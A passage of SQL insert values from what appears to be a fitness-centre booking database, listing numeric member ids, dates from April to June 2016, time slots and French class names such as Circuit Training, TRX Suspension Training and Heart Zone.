(6676, 63, 'CTR', '2016-04-13', '17h30', '18h', 'TRX Suspension Training'),
(6677, 224, 'CTR', '2016-04-14', '12h00', '12h30', 'Circuit training'),
(6763, 54, 'CTR', '2016-04-25', '18h15', '18h45', 'Heart Zone partie 1'),
(6760, 101, 'CTR', '2016-04-23', '10h15', '10h45', 'Circuit Niveau 1'),
(6682, 211, 'CTR', '2016-04-14', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6683, 142, 'CTR', '2016-04-14', '18h15', '18h45', 'Circuit Training'),
(6684, 143, 'CTR', '2016-04-14', '18h15', '18h45', 'Circuit Training'),
(6685, 44, 'CTR', '2016-04-14', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6686, 44, 'CTR', '2016-04-16', '10h15', '10h45', 'Circuit Niveau 1'),
(6688, 31, 'CTR', '2016-04-16', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6689, 31, 'CTR', '2016-04-16', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6690, 193, 'CTR', '2016-04-20', '18h15', '18h45', 'Circuit Training'),
(6691, 193, 'CTR', '2016-04-20', '19h ', '19h30', 'Circuit training'),
(6697, 48, 'CTR', '2016-04-20', '19h ', '19h30', 'Circuit training'),
(6698, 31, 'CTR', '2016-04-20', '18h15', '18h45', 'Circuit Training'),
(6699, 31, 'CTR', '2016-04-20', '19h ', '19h30', 'Circuit training'),
(6701, 205, 'CTR', '2016-04-18', '17h30', '18h00', 'TRX Suspension Training'),
(6702, 175, 'CTR', '2016-04-18', '17h30', '18h00', 'TRX Suspension Training'),
(6703, 44, 'CTR', '2016-04-18', '17h30', '18h00', 'TRX Suspension Training'),
(6704, 213, 'CTR', '2016-04-19', '19h00', '19h30', 'Duo Training'),
(6761, 230, 'CTR', '2016-04-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6706, 230, 'CTR', '2016-04-20', '18h15', '18h45', 'Circuit Training'),
(6707, 228, 'CTR', '2016-04-20', '18h15', '18h45', 'Circuit Training'),
(6708, 227, 'CTR', '2016-04-20', '18h15', '18h45', 'Circuit Training'),
(6709, 138, 'CTR', '2016-04-20', '18h15', '18h45', 'Circuit Training'),
(6710, 230, 'CTR', '2016-04-20', '19h ', '19h30', 'Circuit training'),
(6711, 227, 'CTR', '2016-04-20', '19h ', '19h30', 'Circuit training'),
(6712, 228, 'CTR', '2016-04-20', '19h ', '19h30', 'Circuit training'),
(6713, 205, 'CTR', '2016-04-20', '19h ', '19h30', 'Circuit training'),
(6714, 179, 'CTR', '2016-04-20', '19h ', '19h30', 'Circuit training'),
(6715, 181, 'CTR', '2016-04-20', '19h ', '19h30', 'Circuit training'),
(6716, 205, 'CTR', '2016-04-20', '19h45', '20h15', 'Clubs Sportifs'),
(6717, 195, 'CTR', '2016-04-20', '18h15', '18h45', 'Circuit Training'),
(6718, 196, 'CTR', '2016-04-20', '20h30', '21h', 'Circuit Training'),
(6719, 173, 'CTR', '2016-04-20', '20h30', '21h', 'Circuit Training'),
(6720, 180, 'CTR', '2016-04-20', '20h30', '21h', 'Circuit Training'),
(6721, 60, 'CTR', '2016-04-20', '20h30', '21h', 'Circuit Training'),
(6722, 188, 'CTR', '2016-04-20', '20h30', '21h', 'Circuit Training'),
(6723, 188, 'CTR', '2016-04-20', '20h30', '21h', 'Circuit Training'),
(6724, 188, 'CTR', '2016-04-20', '20h30', '21h', 'Circuit Training'),
(6725, 80, 'CTR', '2016-04-26', '19h45', '20h30', 'Circuit Training'),
(6759, 48, 'CTR', '2016-04-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6758, 48, 'CTR', '2016-04-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6728, 48, 'CTR', '2016-04-25', '18h15', '18h45', 'Heart Zone partie 1'),
(6729, 48, 'CTR', '2016-04-25', '18h45', '19h15', 'Heart Zone partie 2'),
(6730, 230, 'CTR', '2016-04-25', '18h15', '18h45', 'Heart Zone partie 1'),
(6731, 230, 'CTR', '2016-04-25', '18h45', '19h15', 'Heart Zone partie 2'),
(6732, 205, 'CTR', '2016-04-25', '18h15', '18h45', 'Heart Zone partie 1'),
(6733, 205, 'CTR', '2016-04-25', '18h45', '19h15', 'Heart Zone partie 2'),
(6734, 50, 'CTR', '2016-04-25', '18h15', '18h45', 'Heart Zone partie 1'),
(6735, 50, 'CTR', '2016-04-25', '18h45', '19h15', 'Heart Zone partie 2'),
(6736, 28, 'CTR', '2016-04-25', '17h30', '18h00', 'TRX Suspension Training'),
(6737, 199, 'CTR', '2016-04-25', '17h30', '18h00', 'TRX Suspension Training'),
(6762, 230, 'CTR', '2016-04-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6740, 231, 'CTR', '2016-04-20', '18h15', '18h45', 'Circuit Training'),
(6764, 54, 'CTR', '2016-04-25', '18h45', '19h15', 'Heart Zone partie 2'),
(6742, 191, 'CTR', '2016-04-21', '12h45', '13h15', 'Circuit training'),
(6743, 63, 'CTR', '2016-04-20', '17h30', '18h', 'TRX Suspension Training'),
(6744, 147, 'CTR', '2016-04-20', '17h30', '18h', 'TRX Suspension Training'),
(6745, 140, 'CTR', '2016-04-21', '12h00', '12h30', 'Circuit training'),
(6746, 205, 'CTR', '2016-04-21', '12h00', '12h30', 'Circuit training'),
(6747, 189, 'CTR', '2016-04-21', '12h00', '12h30', 'Circuit training'),
(6750, 213, 'CTR', '2016-04-24', '10h15', '10h45', 'Duo Training'),
(6751, 31, 'CTR', '2016-04-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6752, 31, 'CTR', '2016-04-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6753, 228, 'CTR', '2016-04-27', '18h15', '18h45', 'Circuit Training'),
(6754, 228, 'CTR', '2016-04-27', '19h ', '19h30', 'Circuit training'),
(6755, 210, 'CTR', '2016-04-23', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6756, 210, 'CTR', '2016-04-23', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6765, 56, 'CTR', '2016-04-25', '18h15', '18h45', 'Heart Zone partie 1'),
(6767, 56, 'CTR', '2016-04-25', '18h45', '19h15', 'Heart Zone partie 2'),
(6800, 54, 'CTR', '2016-05-02', '18h15', '18h45', 'Heart Zone partie 1'),
(6783, 230, 'CTR', '2016-04-27', '18h15', '18h45', 'Circuit Training'),
(6771, 80, 'CTR', '2016-04-25', '18h15', '18h45', 'Heart Zone partie 1'),
(6772, 80, 'CTR', '2016-04-25', '18h45', '19h15', 'Heart Zone partie 2'),
(6774, 235, 'CTR', '2016-04-26', '19h45', '20h30', 'Circuit Training'),
(6775, 205, 'CTR', '2016-04-25', '17h30', '18h00', 'TRX Suspension Training'),
(6782, 53, 'CTR', '2016-04-25', '18h45', '19h15', 'Heart Zone partie 2'),
(6781, 53, 'CTR', '2016-04-25', '18h15', '18h45', 'Heart Zone partie 1'),
(6778, 213, 'CTR', '2016-04-26', '19h00', '19h30', 'Duo Training'),
(6779, 195, 'CTR', '2016-04-25', '17h30', '18h00', 'TRX Suspension Training'),
(6780, 63, 'CTR', '2016-04-25', '17h30', '18h00', 'TRX Suspension Training'),
(6784, 138, 'CTR', '2016-04-27', '18h15', '18h45', 'Circuit Training'),
(6785, 48, 'CTR', '2016-04-27', '18h15', '18h45', 'Circuit Training'),
(6786, 31, 'CTR', '2016-04-27', '18h15', '18h45', 'Circuit Training'),
(6787, 195, 'CTR', '2016-04-27', '18h15', '18h45', 'Circuit Training'),
(6788, 236, 'CTR', '2016-04-27', '18h15', '18h45', 'Circuit Training'),
(6789, 48, 'CTR', '2016-04-27', '19h ', '19h30', 'Circuit training'),
(6790, 31, 'CTR', '2016-04-27', '19h ', '19h30', 'Circuit training'),
(6791, 205, 'CTR', '2016-04-27', '19h ', '19h30', 'Circuit training'),
(6830, 191, 'CTR', '2016-04-28', '18h15', '18h45', 'Circuit Training'),
(6793, 180, 'CTR', '2016-04-27', '20h30', '21h', 'Circuit Training'),
(6794, 173, 'CTR', '2016-04-27', '20h30', '21h', 'Circuit Training'),
(6795, 196, 'CTR', '2016-04-27', '20h30', '21h', 'Circuit Training'),
(6796, 188, 'CTR', '2016-04-27', '20h30', '21h', 'Circuit Training'),
(6797, 188, 'CTR', '2016-04-27', '20h30', '21h', 'Circuit Training'),
(6831, 235, 'CTR', '2016-04-28', '18h15', '18h45', 'Circuit Training'),
(6799, 60, 'CTR', '2016-04-27', '20h30', '21h', 'Circuit Training'),
(6802, 53, 'CTR', '2016-05-02', '18h15', '18h45', 'Heart Zone partie 1'),
(6891, 237, 'CTR', '2016-05-11', '18h15', '18h45', 'Circuit Training'),
(6804, 205, 'CTR', '2016-05-02', '18h15', '18h45', 'Heart Zone partie 1'),
(6888, 44, 'CTR', '2016-05-07', '10h15', '10h45', 'Circuit Niveau 1'),
(6806, 56, 'CTR', '2016-05-02', '18h15', '18h45', 'Heart Zone partie 1'),
(6889, 101, 'CTR', '2016-05-07', '10h15', '10h45', 'Circuit Niveau 1'),
(6808, 48, 'CTR', '2016-05-02', '18h15', '18h45', 'Heart Zone partie 1'),
(6892, 237, 'CTR', '2016-05-12', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6810, 50, 'CTR', '2016-05-02', '18h15', '18h45', 'Heart Zone partie 1'),
(6811, 50, 'CTR', '2016-05-02', '18h45', '19h15', 'Heart Zone partie 2'),
(6812, 230, 'CTR', '2016-05-02', '18h15', '18h45', 'Heart Zone partie 1'),
(6890, 237, 'CTR', '2016-05-09', '17h30', '18h00', 'TRX Suspension Training'),
(6814, 92, 'CTR', '2016-05-02', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6815, 92, 'CTR', '2016-05-02', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6847, 205, 'CTR', '2016-05-02', '17h30', '18h00', 'TRX Suspension Training'),
(6819, 92, 'CTR', '2016-04-26', '19h45', '20h30', 'Circuit Training'),
(6820, 92, 'CTR', '2016-04-26', '19h45', '20h30', 'Circuit Training'),
(6833, 189, 'CTR', '2016-04-28', '12h00', '12h30', 'Circuit training'),
(6822, 231, 'CTR', '2016-04-27', '18h15', '18h45', 'Circuit Training'),
(6879, 147, 'CTR', '2016-05-04', '19h45', '20h15', 'Circuit Training'),
(6832, 205, 'CTR', '2016-04-28', '12h00', '12h30', 'Circuit training'),
(6826, 44, 'CTR', '2016-04-28', '18h15', '18h45', 'Circuit Training'),
(6827, 31, 'CTR', '2016-04-30', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6828, 31, 'CTR', '2016-04-30', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6829, 218, 'CTR', '2016-04-28', '18h15', '18h45', 'Circuit Training'),
(6834, 37, 'CTR', '2016-04-28', '18h15', '18h45', 'Circuit Training'),
(6835, 233, 'CTR', '2016-04-28', '18h15', '18h45', 'Circuit Training'),
(6836, 48, 'CTR', '2016-04-30', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6837, 48, 'CTR', '2016-04-30', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6838, 210, 'CTR', '2016-04-30', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6839, 210, 'CTR', '2016-04-30', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6840, 192, 'CTR', '2016-04-30', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6841, 192, 'CTR', '2016-04-30', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6842, 230, 'CTR', '2016-04-30', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6843, 230, 'CTR', '2016-04-30', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6873, 236, 'CTR', '2016-05-02', '17h30', '18h00', 'TRX Suspension Training'),
(6846, 233, 'CTR', '2016-05-02', '20h30', '21h00', 'Circuit Training'),
(6848, 199, 'CTR', '2016-05-02', '17h30', '18h00', 'TRX Suspension Training'),
(6849, 28, 'CTR', '2016-05-02', '17h30', '18h00', 'TRX Suspension Training'),
(6856, 195, 'CTR', '2016-05-04', '18h15', '18h45', 'Circuit Training'),
(6880, 205, 'CTR', '2016-05-04', '17h30', '18h', 'TRX Suspension Training'),
(6852, 231, 'CTR', '2016-05-04', '18h15', '18h45', 'Circuit Training'),
(6853, 48, 'CTR', '2016-05-04', '18h15', '18h45', 'Circuit Training'),
(6854, 31, 'CTR', '2016-05-04', '18h15', '18h45', 'Circuit Training'),
(6855, 230, 'CTR', '2016-05-04', '18h15', '18h45', 'Circuit Training'),
(6857, 230, 'CTR', '2016-05-04', '19h ', '19h30', 'Circuit training'),
(6858, 48, 'CTR', '2016-05-04', '19h ', '19h30', 'Circuit training'),
(6859, 31, 'CTR', '2016-05-04', '19h ', '19h30', 'Circuit training'),
(6861, 173, 'CTR', '2016-05-04', '20h30', '21h', 'Circuit Training'),
(6862, 180, 'CTR', '2016-05-04', '20h30', '21h', 'Circuit Training'),
(6863, 196, 'CTR', '2016-05-04', '20h30', '21h', 'Circuit Training'),
(6864, 60, 'CTR', '2016-05-04', '20h30', '21h', 'Circuit Training'),
(6865, 188, 'CTR', '2016-05-04', '20h30', '21h', 'Circuit Training'),
(6866, 188, 'CTR', '2016-05-04', '20h30', '21h', 'Circuit Training'),
(6876, 222, 'CTR', '2016-05-04', '17h30', '18h', 'TRX Suspension Training'),
(6868, 213, 'CTR', '2016-05-01', '10h15', '10h45', 'Duo Training'),
(6869, 132, 'CTR', '2016-05-04', '20h30', '21h', 'Circuit Training'),
(6881, 80, 'CTR', '2016-05-05', '12h00', '12h30', 'Circuit training'),
(6882, 80, 'CTR', '2016-05-05', '12h00', '12h30', 'Circuit training'),
(6883, 28, 'CTR', '2016-05-05', '12h00', '12h30', 'Circuit training'),
(6884, 189, 'CTR', '2016-05-05', '12h00', '12h30', 'Circuit training'),
(6885, 205, 'CTR', '2016-05-05', '12h00', '12h30', 'Circuit training'),
(6886, 48, 'CTR', '2016-05-07', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6887, 48, 'CTR', '2016-05-07', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6956, 44, 'CTR', '2016-05-12', '18h15', '18h45', 'Circuit Training'),
(6894, 238, 'CTR', '2016-05-10', '19h45', '20h30', 'Circuit Training'),
(6895, 238, 'CTR', '2016-05-11', '18h15', '18h45', 'Circuit Training'),
(6896, 238, 'CTR', '2016-05-12', '18h15', '18h45', 'Circuit Training'),
(6897, 240, 'CTR', '2016-05-10', '19h45', '20h30', 'Circuit Training'),
(6898, 240, 'CTR', '2016-05-11', '18h15', '18h45', 'Circuit Training'),
(6899, 240, 'CTR', '2016-05-12', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6968, 240, 'CTR', '2016-05-14', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6987, 237, 'CTR', '2016-05-18', '18h15', '18h45', 'Circuit Training'),
(6902, 199, 'CTR', '2016-05-09', '17h30', '18h00', 'TRX Suspension Training'),
(6903, 28, 'CTR', '2016-05-09', '17h30', '18h00', 'TRX Suspension Training'),
(6904, 54, 'CTR', '2016-05-09', '18h15', '18h45', 'Heart Zone partie 1'),
(6905, 54, 'CTR', '2016-05-09', '18h45', '19h15', 'Heart Zone partie 2'),
(6906, 53, 'CTR', '2016-05-09', '18h45', '19h15', 'Heart Zone partie 2'),
(6907, 50, 'CTR', '2016-05-09', '18h15', '18h45', 'Heart Zone partie 1'),
(6908, 50, 'CTR', '2016-05-09', '18h45', '19h15', 'Heart Zone partie 2'),
(6909, 53, 'CTR', '2016-05-09', '18h15', '18h45', 'Heart Zone partie 1'),
(6963, 118, 'CTR', '2016-05-11', '19h ', '19h30', 'Circuit training'),
(6962, 213, 'CTR', '2016-05-15', '10h15', '10h45', 'Duo Training'),
(6912, 230, 'CTR', '2016-05-09', '18h15', '18h45', 'Heart Zone partie 1'),
(6913, 230, 'CTR', '2016-05-09', '18h45', '19h15', 'Heart Zone partie 2'),
(6914, 48, 'CTR', '2016-05-09', '18h15', '18h45', 'Heart Zone partie 1'),
(6915, 48, 'CTR', '2016-05-09', '18h45', '19h15', 'Heart Zone partie 2'),
(6916, 205, 'CTR', '2016-05-09', '18h15', '18h45', 'Heart Zone partie 1'),
(6917, 205, 'CTR', '2016-05-09', '18h45', '19h15', 'Heart Zone partie 2'),
(6947, 69, 'CTR', '2016-05-09', '18h15', '18h45', 'Heart Zone partie 1'),
(6948, 69, 'CTR', '2016-05-09', '18h45', '19h15', 'Heart Zone partie 2'),
(6985, 132, 'CTR', '2016-05-18', '20h30', '21h', 'Circuit Training'),
(6923, 195, 'CTR', '2016-05-11', '18h15', '18h45', 'Circuit Training'),
(6959, 147, 'CTR', '2016-05-11', '19h45', '20h15', 'Circuit Training'),
(6925, 230, 'CTR', '2016-05-11', '18h15', '18h45', 'Circuit Training'),
(6926, 48, 'CTR', '2016-05-11', '18h15', '18h45', 'Circuit Training'),
(6927, 31, 'CTR', '2016-05-11', '18h15', '18h45', 'Circuit Training'),
(6929, 230, 'CTR', '2016-05-11', '19h ', '19h30', 'Circuit training'),
(6930, 48, 'CTR', '2016-05-11', '19h ', '19h30', 'Circuit training'),
(6931, 31, 'CTR', '2016-05-11', '19h ', '19h30', 'Circuit training'),
(6932, 126, 'CTR', '2016-05-11', '19h45', '20h15', 'Circuit Training'),
(6933, 204, 'CTR', '2016-05-11', '20h30', '21h', 'Circuit Training'),
(6934, 196, 'CTR', '2016-05-11', '20h30', '21h', 'Circuit Training'),
(6935, 173, 'CTR', '2016-05-11', '20h30', '21h', 'Circuit Training'),
(6936, 180, 'CTR', '2016-05-11', '20h30', '21h', 'Circuit Training'),
(6937, 188, 'CTR', '2016-05-11', '20h30', '21h', 'Circuit Training'),
(6938, 188, 'CTR', '2016-05-11', '20h30', '21h', 'Circuit Training'),
(6939, 188, 'CTR', '2016-05-11', '20h30', '21h', 'Circuit Training'),
(6941, 210, 'CTR', '2016-05-09', '17h30', '18h00', 'TRX Suspension Training'),
(6942, 210, 'CTR', '2016-05-12', '18h15', '18h45', 'Circuit Training'),
(6943, 213, 'CTR', '2016-05-08', '10h15', '10h45', 'Duo Training'),
(6944, 213, 'CTR', '2016-05-08', '10h15', '10h45', 'Duo Training'),
(6988, 238, 'CTR', '2016-05-18', '18h15', '18h45', 'Circuit Training'),
(6949, 171, 'CTR', '2016-05-11', '19h ', '19h30', 'Circuit training'),
(6950, 164, 'CTR', '2016-05-11', '19h ', '19h30', 'Circuit training'),
(6951, 228, 'CTR', '2016-05-11', '19h ', '19h30', 'Circuit training'),
(6952, 228, 'CTR', '2016-05-11', '19h45', '20h15', 'Circuit Training'),
(6953, 227, 'CTR', '2016-05-11', '19h ', '19h30', 'Circuit training'),
(6954, 227, 'CTR', '2016-05-11', '19h45', '20h15', 'Circuit Training'),
(6955, 237, 'CTR', '2016-05-14', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6957, 233, 'CTR', '2016-05-11', '20h30', '21h', 'Circuit Training'),
(6958, 211, 'CTR', '2016-05-11', '20h30', '21h', 'Circuit Training'),
(6960, 90, 'CTR', '2016-05-11', '19h45', '20h15', 'Circuit Training'),
(6961, 56, 'CTR', '2016-05-11', '20h30', '21h', 'Circuit Training'),
(6964, 205, 'CTR', '2016-05-11', '18h15', '18h45', 'Circuit Training'),
(6965, 205, 'CTR', '2016-05-11', '19h ', '19h30', 'Circuit training'),
(6966, 80, 'CTR', '2016-05-11', '19h45', '20h15', 'Circuit Training'),
(6967, 192, 'CTR', '2016-05-12', '18h15', '18h45', 'Circuit Training'),
(6969, 240, 'CTR', '2016-05-16', '17h30', '18h00', 'TRX Suspension Training'),
(6970, 240, 'CTR', '2016-05-19', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6971, 140, 'CTR', '2016-05-12', '12h00', '12h30', 'Circuit training'),
(6972, 191, 'CTR', '2016-05-12', '18h15', '18h45', 'Circuit Training'),
(6973, 90, 'CTR', '2016-05-12', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6975, 147, 'CTR', '2016-05-12', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6976, 126, 'CTR', '2016-05-12', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6977, 222, 'CTR', '2016-05-12', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6978, 90, 'CTR', '2016-05-12', '18h15', '18h45', 'Circuit Training'),
(6979, 126, 'CTR', '2016-05-12', '18h15', '18h45', 'Circuit Training'),
(6980, 147, 'CTR', '2016-05-12', '18h15', '18h45', 'Circuit Training'),
(6981, 209, 'CTR', '2016-05-12', '19h00', '19h30', 'Personal Training'),
(6982, 105, 'CTR', '2016-05-12', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6983, 189, 'CTR', '2016-05-12', '12h00', '12h30', 'Circuit training'),
(6984, 224, 'CTR', '2016-05-12', '12h00', '12h30', 'Circuit training'),
(7074, 205, 'CTR', '2016-05-23', '17h30', '18h00', 'TRX Suspension Training'),
(6989, 240, 'CTR', '2016-05-18', '18h15', '18h45', 'Circuit Training'),
(6990, 230, 'CTR', '2016-05-18', '18h15', '18h45', 'Circuit Training'),
(6991, 228, 'CTR', '2016-05-18', '18h15', '18h45', 'Circuit Training'),
(6992, 231, 'CTR', '2016-05-18', '18h15', '18h45', 'Circuit Training'),
(6993, 195, 'CTR', '2016-05-18', '18h15', '18h45', 'Circuit Training'),
(7045, 224, 'CTR', '2016-05-19', '12h00', '12h30', 'Circuit training'),
(6995, 48, 'CTR', '2016-05-18', '18h15', '18h45', 'Circuit Training'),
(6996, 31, 'CTR', '2016-05-18', '18h15', '18h45', 'Circuit Training'),
(6997, 205, 'CTR', '2016-05-18', '19h ', '19h30', 'Circuit training'),
(6998, 48, 'CTR', '2016-05-18', '19h ', '19h30', 'Circuit training'),
(6999, 31, 'CTR', '2016-05-18', '19h ', '19h30', 'Circuit training'),
(7000, 230, 'CTR', '2016-05-18', '19h ', '19h30', 'Circuit training'),
(7001, 228, 'CTR', '2016-05-18', '19h ', '19h30', 'Circuit training'),
(7002, 118, 'CTR', '2016-05-18', '19h ', '19h30', 'Circuit training'),
(7003, 171, 'CTR', '2016-05-18', '19h ', '19h30', 'Circuit training'),
(7004, 164, 'CTR', '2016-05-18', '19h ', '19h30', 'Circuit training'),
(7005, 119, 'CTR', '2016-05-18', '19h ', '19h30', 'Circuit training'),
(7006, 126, 'CTR', '2016-05-18', '19h45', '20h15', 'Circuit Training'),
(7007, 90, 'CTR', '2016-05-18', '19h45', '20h15', 'Circuit Training'),
(7008, 147, 'CTR', '2016-05-18', '19h45', '20h15', 'Circuit Training'),
(7009, 204, 'CTR', '2016-05-18', '20h30', '21h', 'Circuit Training'),
(7010, 196, 'CTR', '2016-05-18', '20h30', '21h', 'Circuit Training'),
(7011, 173, 'CTR', '2016-05-18', '20h30', '21h', 'Circuit Training'),
(7012, 211, 'CTR', '2016-05-18', '20h30', '21h', 'Circuit Training'),
(7013, 188, 'CTR', '2016-05-18', '20h30', '21h', 'Circuit Training'),
(7014, 188, 'CTR', '2016-05-18', '20h30', '21h', 'Circuit Training'),
(7015, 180, 'CTR', '2016-05-18', '20h30', '21h', 'Circuit Training'),
(7016, 233, 'CTR', '2016-05-18', '20h30', '21h', 'Circuit Training'),
(7017, 60, 'CTR', '2016-05-18', '20h30', '21h', 'Circuit Training'),
(7044, 168, 'CTR', '2016-05-18', '19h45', '20h15', 'Circuit Training'),
(7046, 189, 'CTR', '2016-05-19', '12h00', '12h30', 'Circuit training'),
(7020, 236, 'CTR', '2016-05-16', '17h30', '18h00', 'TRX Suspension Training'),
(7021, 205, 'CTR', '2016-05-16', '17h30', '18h00', 'TRX Suspension Training'),
(7022, 205, 'CTR', '2016-05-12', '12h00', '12h30', 'Circuit training'),
(7054, 230, 'CTR', '2016-05-21', '11h05', '11h35', 'Circuit Niveau 2'),
(7056, 205, 'CTR', '2016-05-19', '18h15', '18h45', 'Circuit Training'),
(7025, 238, 'CTR', '2016-05-16', '17h30', '18h00', 'TRX Suspension Training'),
(7026, 238, 'CTR', '2016-05-19', '18h15', '18h45', 'Circuit Training'),
(7027, 237, 'CTR', '2016-05-16', '17h30', '18h00', 'TRX Suspension Training'),
(7028, 237, 'CTR', '2016-05-19', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7052, 233, 'CTR', '2016-05-21', '11h05', '11h35', 'Circuit Niveau 2'),
(7050, 209, 'CTR', '2016-05-19', '19h00', '19h30', 'Personal Training'),
(7072, 28, 'CTR', '2016-05-23', '17h30', '18h00', 'TRX Suspension Training'),
(7053, 232, 'CTR', '2016-05-21', '11h05', '11h35', 'Circuit Niveau 2'),
(7051, 118, 'CTR', '2016-05-19', '18h15', '18h45', 'Circuit Training'),
(7049, 90, 'CTR', '2016-05-19', '18h15', '18h45', 'Circuit Training'),
(7047, 205, 'CTR', '2016-05-19', '12h00', '12h30', 'Circuit training'),
(7048, 90, 'CTR', '2016-05-19', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7073, 199, 'CTR', '2016-05-23', '17h30', '18h00', 'TRX Suspension Training'),
(7041, 193, 'CTR', '2016-05-23', '18h15', '18h45', 'Heart Zone partie 1'),
(7042, 193, 'CTR', '2016-05-23', '18h45', '19h15', 'Heart Zone partie 2'),
(7055, 230, 'CTR', '2016-05-21', '11h40', '12h10', 'Circuit Niveau 3'),
(7057, 105, 'CTR', '2016-05-19', '18h15', '18h45', 'Circuit Training'),
(7058, 48, 'CTR', '2016-05-21', '10h30', '11h00', 'Circuit Niveau 1'),
(7059, 48, 'CTR', '2016-05-21', '11h05', '11h35', 'Circuit Niveau 2'),
(7060, 31, 'CTR', '2016-05-21', '10h30', '11h00', 'Circuit Niveau 1'),
(7061, 31, 'CTR', '2016-05-21', '11h05', '11h35', 'Circuit Niveau 2'),
(7142, 193, 'CTR', '2016-06-06', '18h15', '18h45', 'Heart Zone partie 1'),
(7140, 193, 'CTR', '2016-05-25', '18h15', '18h45', 'Circuit Training'),
(7156, 210, 'CTR', '2016-05-26', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7066, 205, 'CTR', '2016-05-23', '18h15', '18h45', 'Heart Zone partie 1'),
(7067, 205, 'CTR', '2016-05-23', '18h45', '19h15', 'Heart Zone partie 2'),
(7068, 230, 'CTR', '2016-05-23', '18h15', '18h45', 'Heart Zone partie 1'),
(7069, 230, 'CTR', '2016-05-23', '18h45', '19h15', 'Heart Zone partie 2'),
(7111, 48, 'CTR', '2016-05-30', '18h45', '19h15', 'Heart Zone partie 2'),
(7110, 48, 'CTR', '2016-05-30', '18h15', '18h45', 'Heart Zone partie 1'),
(7075, 231, 'CTR', '2016-05-25', '18h15', '18h45', 'Circuit Training'),
(7076, 237, 'CTR', '2016-05-25', '18h15', '18h45', 'Circuit Training'),
(7077, 238, 'CTR', '2016-05-25', '18h15', '18h45', 'Circuit Training'),
(7078, 228, 'CTR', '2016-05-25', '18h15', '18h45', 'Circuit Training'),
(7079, 230, 'CTR', '2016-05-25', '18h15', '18h45', 'Circuit Training'),
(7080, 195, 'CTR', '2016-05-25', '18h15', '18h45', 'Circuit Training'),
(7081, 48, 'CTR', '2016-05-25', '18h15', '18h45', 'Circuit Training'),
(7082, 31, 'CTR', '2016-05-25', '18h15', '18h45', 'Circuit Training'),
(7083, 171, 'CTR', '2016-05-25', '19h ', '19h30', 'Circuit training'),
(7084, 164, 'CTR', '2016-05-25', '19h ', '19h30', 'Circuit training'),
(7085, 230, 'CTR', '2016-05-25', '19h ', '19h30', 'Circuit training'),
(7086, 228, 'CTR', '2016-05-25', '19h ', '19h30', 'Circuit training'),
(7087, 48, 'CTR', '2016-05-25', '19h ', '19h30', 'Circuit training'),
(7088, 31, 'CTR', '2016-05-25', '19h ', '19h30', 'Circuit training'),
(7089, 168, 'CTR', '2016-05-25', '19h45', '20h15', 'Circuit Training'),
(7090, 126, 'CTR', '2016-05-25', '19h45', '20h15', 'Circuit Training'),
(7091, 90, 'CTR', '2016-05-25', '19h45', '20h15', 'Circuit Training'),
(7092, 204, 'CTR', '2016-05-25', '20h30', '21h', 'Circuit Training'),
(7093, 188, 'CTR', '2016-05-25', '20h30', '21h', 'Circuit Training'),
(7094, 188, 'CTR', '2016-05-25', '20h30', '21h', 'Circuit Training'),
(7095, 173, 'CTR', '2016-05-25', '20h30', '21h', 'Circuit Training'),
(7096, 60, 'CTR', '2016-05-25', '20h30', '21h', 'Circuit Training'),
(7097, 180, 'CTR', '2016-05-25', '20h30', '21h', 'Circuit Training'),
(7098, 132, 'CTR', '2016-05-25', '20h30', '21h', 'Circuit Training'),
(7099, 233, 'CTR', '2016-05-25', '20h30', '21h', 'Circuit Training'),
(7236, 132, 'CTR', '2016-06-04', '11h05', '11h35', 'Circuit Niveau 2'),
(7150, 210, 'CTR', '2016-05-28', '10h30', '11h00', 'Circuit Niveau 1'),
(7102, 205, 'CTR', '2016-05-21', '11h05', '11h35', 'Circuit Niveau 2'),
(7103, 205, 'CTR', '2016-05-21', '11h40', '12h10', 'Circuit Niveau 3'),
(7104, 240, 'CTR', '2016-05-21', '11h05', '11h35', 'Circuit Niveau 2'),
(7105, 240, 'CTR', '2016-05-21', '11h05', '11h35', 'Circuit Niveau 2'),
(7106, 126, 'CTR', '2016-05-23', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
(7143, 193, 'CTR', '2016-06-06', '18h45', '19h15', 'Heart Zone partie 2'),
(7108, 132, 'CTR', '2016-05-23', '19h15', '19h45', 'Heart Zone 2 Partie 1'),
